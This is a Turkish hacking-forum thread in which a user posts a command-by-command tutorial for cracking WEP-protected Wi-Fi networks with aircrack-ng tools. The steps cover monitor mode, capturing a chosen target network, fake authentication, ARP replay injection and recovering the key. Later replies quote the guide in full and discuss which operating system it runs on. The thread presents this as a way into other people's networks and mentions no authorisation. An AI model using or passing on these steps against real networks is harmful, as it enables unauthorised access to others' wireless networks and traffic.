THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

[DR4K0L0L] WEP Kablosuz Ağları Nasıl Kırılır ?

DR4K0L0L - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2016
Mesajlar:
893
Konular:
17
Teşekkür (Etti):
102
Teşekkür (Aldı):
302
Ticaret:
(0) %
05-05-2016 23:09
#1
[DR4K0L0L] WEP Kablosuz Ağları Nasıl Kırılır ?
WEP'in açılımı, "Wired Equivalent Privacy"dir. Bildiğiniz gibi, Wpa, Wpa2, Wep gibi şifreleme mekanizmaları sinyalleri şifreli biçimde gönderir. Ve yine bildiğiniz gibi, insanların kablosuz ağlarını korumaları için bir güvenlik önlemine ihtiyaçları vardır. Bu şifreleme mekanizmaları, bu yüzden vardır. WEP şifrelemesine sahip ağlar, kolayca istismar edilebilir düzeydedir. Bir engel ile karşılaşmadığınız takdirde, işe yarayacaktır.

(Konuyu açma sebebim. Birisi Phishing yöntemi ile WEP şifrelemesini kırmayı göstermişti. Ben de Phishing olmadan kırma yöntemini göstermek istedim. Bulunduğum bölgede WEP ağı olmadığı için resimli anlatım yapamayacağım.)

Öncelikle, eğer monitör modunu etkinleştirmediyseniz, etkinleştirmeniz gereklidir:
Kod:
airmon-ng start wlan0
wlan0 kısmına arayüzünüzün adını girmelisiniz. "ifconfig" yardımı ile öğrenebilirsiniz.

Daha sonra, bir hedef belirlemeliyiz:
Kod:
airodump-ng wlan0mon
Yazdığımız zaman, karşımıza sinyali çeken ağların bilgileri çıkacaktır. Buradan, bize uygun olan WEP şifrelemeli ağı seçiyoruz:

Kod:
airodump-ng --bssid AğınBSSIDi -c KanalNumarası -w herhangibirdosyaismi wlan0mon
Burada;

--bssid = Hedef ağımızın BSSID numarasını giriyoruz.
-c = Hedef ağımızın kanalını giriyoruz. Channel olarak belirtilir.
-w = Gelen - giden bağlantıları bir dosyaya yazması için kullanıyoruz.
wlan0mon = Bu da, airmon-ng de start wlan0 yaptığımda ortaya çıkan monitör modunun ismi. Bu sizde değişik olabilir. Genel olarak mon0 olarak geçer. "ifconfig" ile bakabilirsiniz. Ya da airmon-ng komudu ile...

Şimdi ise yazılımımız çalıştı ve bağlantıları dosyaya yazmaya başladı. 10 - 15 dakika bekleyin ve "Ctrl + c" yaparak işlemi sonlandırın. Bize, STATION numarası gerekli. Bunun için aireplay aracını kullanarak "Authentication" paketi göndereceğiz:
Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID --ignore-negative-one wlan0mon
Bunu yazdığımızda STATION kısmını göreceğiz.

Şimdi, tekrar aireplay aracına ihtiyacımız var:

Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon
Şimdi, STATION nedir ? Diyebilirsiniz:

STATION, makinenin MAC adresidir.

Şimdi, yine aireplay aracını kullanacağız:

Kod:
aireplay-ng --arpreplay -b WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon
Bunu kullandığımızda, hedefe ARP paketleri (--arpreplay) gönderiyoruz. Böylece, paket topluyoruz. Bir 15 - 20 saniye bekleyin.

Şimdi ise, Aircrack aracını kullanarak WEP keyini bulmaya çalışacağız:
Kod:
aircrack-ng dosyaismi.cap
dosyaismi yerine, bağlantıları dinlerken belirttiğiniz dosya ismini (Benim herhangibirdosyaismi idi) bularak, onun adını girmeniz gereklidir. Örneğin, herhangibirdosyaismi-01.cap (Ben herhangibirdosyaismi şeklinde belirttiğim için) şeklinde. Yine de onu kaydettiğiniz yere bakıp bularak bakabilirsiniz. (Root klasöründe olabilir. Eğer bulamazsanız "locate" komudunu kullanınız.)

Bunu yaptığımızda, Aircrack şifre kırma işlemine başlıyor. Bir süre sonra, "KEY FOUND! [ AA:BB:CCD:EE ]" şeklinde çıktı, diyelim. O halde şifremiz, "AABBCCDDEE" olacaktır. Orada çıkan key'in içerisindeki ':'leri kaldırın.

Bunun gibi bir çok yöntem mevcut. Araştırarak elde edebilirsiniz...
---------------------
Konu DR4K0L0L tarafından (06-05-2016 15:57 Saat 15:57 ) değiştirilmiştir.
CenDoS 7, Samir007 Teşekkür etti.
CenDoS 7 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2016
Nereden:
İstanbul
Mesajlar:
340
Konular:
11
Teşekkür (Etti):
125
Teşekkür (Aldı):
73
Ticaret:
(0) %
05-05-2016 23:26
#2
Güzel konu
BCAllame - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2016
Mesajlar:
62
Konular:
10
Teşekkür (Etti):
21
Teşekkür (Aldı):
2
Ticaret:
(0) %
06-05-2016 15:28
#3
Wep ile şifrelenen çok wi-fi yoktur sanırım wpa2 gibi yöntemlerle şifreleniyorlar ama eline sağlık yararlı konu
--------------------- WE ARE LIVE IN A KINGDOM OF BULLSHIT
talyus - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2007
Nereden:
Diye Sorma
Mesajlar:
2.165
Konular:
122
Teşekkür (Etti):
549
Teşekkür (Aldı):
626
Ticaret:
(0) %
06-05-2016 15:30
#4
wep kaldimi ya kullanan ellerine saglik yinede
Samir007 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
290
Konular:
38
Teşekkür (Etti):
179
Teşekkür (Aldı):
16
Ticaret:
(0) %
06-05-2016 15:32
#5
Alıntı:
DR4K0L0L´isimli üyeden Alıntı Mesajı göster
WEP'in açılımı, "Wired Equivalent Privacy"dir. Bildiğiniz gibi, Wpa, Wpa2, Wep gibi şifreleme mekanizmaları sinyalleri şifreli biçimde gönderir. Ve yine bildiğiniz gibi, insanların kablosuz ağlarını korumaları için bir güvenlik önlemine ihtiyaçları vardır. Bu şifreleme mekanizmaları, bu yüzden vardır. WEP şifrelemesine sahip ağlar, kolayca istismar edilebilir düzeydedir. Bir engel ile karşılaşmadığınız takdirde, işe yarayacaktır.

(Konuyu açma sebebim. Birisi Phishing yöntemi ile WEP şifrelemesini kırmayı göstermişti. Ben de Phishing olmadan kırma yöntemini göstermek istedim. Bulunduğum bölgede WEP ağı olmadığı için resimli anlatım yapamayacağım.)

Öncelikle, eğer monitör modunu etkinleştirmediyseniz, etkinleştirmeniz gereklidir:
Kod:
airmon-ng start wlan0
wlan0 kısmına arayüzünüzün adını girmelisiniz. "ifconfig" yardımı ile öğrenebilirsiniz.

Daha sonra, bir hedef belirlemeliyiz:
Kod:
airodump-ng wlan0mon
Yazdığımız zaman, karşımıza sinyali çeken ağların bilgileri çıkacaktır. Buradan, bize uygun olan WEP şifrelemeli ağı seçiyoruz:

Kod:
airodump-ng --bssid AğınBSSIDi -c KanalNumarası -w herhangibirdosyaismi wlan0mon
Burada;

--bssid = Hedef ağımızın BSSID numarasını giriyoruz.
-c = Hedef ağımızın kanalını giriyoruz. Channel olarak belirtilir.
-w = Gelen - giden bağlantıları bir dosyaya yazması için kullanıyoruz.
wlan0mon = Bu da, airmon-ng de start wlan0 yaptığımda ortaya çıkan monitör modunun ismi. Bu sizde değişik olabilir. Genel olarak mon0 olarak geçer. "ifconfig" ile bakabilirsiniz. Ya da airmon-ng komudu ile...

Şimdi ise yazılımımız çalıştı ve bağlantıları dosyaya yazmaya başladı. Bize, STATION numarası gerekli. Bunun için aireplay aracını kullanarak "Authentication" paketi göndereceğiz:
Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID --ignore-negative-one wlan0mon
Bunu yazdığımızda STATION kısmını göreceğiz.

Şimdi, tekrar aireplay aracına ihtiyacımız var:

Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon
Şimdi, STATION nedir ? Diyebilirsiniz:

STATION, makinenin MAC adresidir.

Şimdi, yine aireplay aracını kullanacağız:

Kod:
aireplay-ng --arpreplay -b WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon
Bunu kullandığımızda, hedefe ARP paketleri (--arpreplay) gönderiyoruz. Böylece, paket topluyoruz. Bir 15 - 20 saniye bekleyin.

Şimdi ise, Aircrack aracını kullanarak WEP keyini bulmaya çalışacağız:
Kod:
aircrack-ng dosyaismi.cap
dosyaismi yerine, bağlantıları dinlerken belirttiğiniz dosya ismini (Benim herhangibirdosyaismi idi) bularak, onun adını girmeniz gereklidir. Örneğin, herhangibirdosyaismi-01.cap (Ben herhangibirdosyaismi şeklinde belirttiğim için) şeklinde. Yine de onu kaydettiğiniz yere bakıp bularak bakabilirsiniz. (Root klasöründe olabilir. Eğer bulamazsanız "locate" komudunu kullanınız.)

Bunu yaptığımızda, Aircrack şifre kırma işlemine başlıyor. Bir süre sonra, "KEY FOUND! [ AA:BB:CCD:EE ]" şeklinde çıktı, diyelim. O halde şifremiz, "AABBCCDDEE" olacaktır. Orada çıkan key'in içerisindeki ':'leri kaldırın.

Bunun gibi bir çok yöntem mevcut. Araştırarak elde edebilirsiniz...
Linux icinmi ?
--------------------- Sonunu Dusunen Kahraman Olamaz!
CenDoS 7 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2016
Nereden:
İstanbul
Mesajlar:
340
Konular:
11
Teşekkür (Etti):
125
Teşekkür (Aldı):
73
Ticaret:
(0) %
06-05-2016 15:36
#6
Alıntı:
Samir007´isimli üyeden Alıntı Mesajı göster
Linux icinmi ?
Şaka mı yapıyorsun ?
DR4K0L0L - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2016
Mesajlar:
893
Konular:
17
Teşekkür (Etti):
102
Teşekkür (Aldı):
302
Ticaret:
(0) %
06-05-2016 15:37
#7
Alıntı:
Samir007´isimli üyeden Alıntı Mesajı göster
Linux icinmi ?
Evet, Linux için anlattım. Fakat, bu yazılımlar (Halk arasında "Air Serisi") Windows ya da diğer OSlar için de bulunuyorsa, aynı komutları deneyebilirsiniz. Hiç Windows, OS X vb. için araştırmadım.
---------------------
CenDoS 7, Samir007 Teşekkür etti.
Samir007 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
290
Konular:
38
Teşekkür (Etti):
179
Teşekkür (Aldı):
16
Ticaret:
(0) %
06-05-2016 15:45
#8
Alıntı:
DR4K0L0L´isimli üyeden Alıntı Mesajı göster
Evet, Linux için anlattım. Fakat, bu yazılımlar (Halk arasında "Air Serisi") Windows ya da diğer OSlar için de bulunuyorsa, aynı komutları deneyebilirsiniz. Hiç Windows, OS X vb. için araştırmadım.
Tesekkurler hocam
--------------------- Sonunu Dusunen Kahraman Olamaz!
Samir007 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
290
Konular:
38
Teşekkür (Etti):
179
Teşekkür (Aldı):
16
Ticaret:
(0) %
06-05-2016 15:45
#9
Alıntı:
CenDoS 7´isimli üyeden Alıntı Mesajı göster
Şaka mı yapıyorsun ?
Neden saka yapiyim
--------------------- Sonunu Dusunen Kahraman Olamaz!
CenDoS 7 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2016
Nereden:
İstanbul
Mesajlar:
340
Konular:
11
Teşekkür (Etti):
125
Teşekkür (Aldı):
73
Ticaret:
(0) %
06-05-2016 15:46
#10
Alıntı:
Samir007´isimli üyeden Alıntı Mesajı göster
Neden saka yapiyim
Hack forumunda Linux kullanılır zaten . Aynı zamanda . Linux uygulaması aircrack-ng

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler